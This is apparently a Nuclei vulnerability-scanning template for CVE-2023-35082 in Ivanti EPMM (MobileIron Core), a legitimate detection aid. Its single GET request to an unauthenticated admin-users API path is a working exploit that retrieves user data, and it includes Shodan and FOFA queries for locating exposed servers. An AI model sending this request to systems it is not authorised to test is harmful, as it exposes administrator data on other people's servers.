34 lines
1.3 KiB
YAML
34 lines
1.3 KiB
YAML
|
id: CVE-2023-35082
|
|||
|
|
|
|||
|
|
info:
|
|||
|
|
name: MobileIron Core - Remote Unauthenticated API Access
|
|||
|
|
author: DhiyaneshDk
|
|||
|
|
severity: critical
|
|||
|
|
description: |
|
|||
|
|
Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.
|
|||
|
|
remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
|
|||
|
|
reference:
|
|||
|
|
- https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
|
|||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-35082
|
|||
|
|
- https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
|
|||
|
|
metadata:
|
|||
|
|
max-request: 1
|
|||
|
|
verified: true
|
|||
|
|
fofa-query: icon_hash="362091310"
|
|||
|
|
shodan-query: http.favicon.hash:362091310
|
|||
|
|
tags: cve,cve2023,kev,ivanti,mobileiron,epmm
|
|||
|
|
|
|||
|
|
http:
|
|||
|
|
- method: GET
|
|||
|
|
path:
|
|||
|
|
- "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"
|
|||
|
|
|
|||
|
|
max-size: 100
|
|||
|
|
matchers:
|
|||
|
|
- type: dsl
|
|||
|
|
dsl:
|
|||
|
|
- contains_all(body, 'results','userId','name')
|
|||
|
|
- contains(header, 'application/json')
|
|||
|
|
- status_code == 200
|
|||
|
|
condition: and
|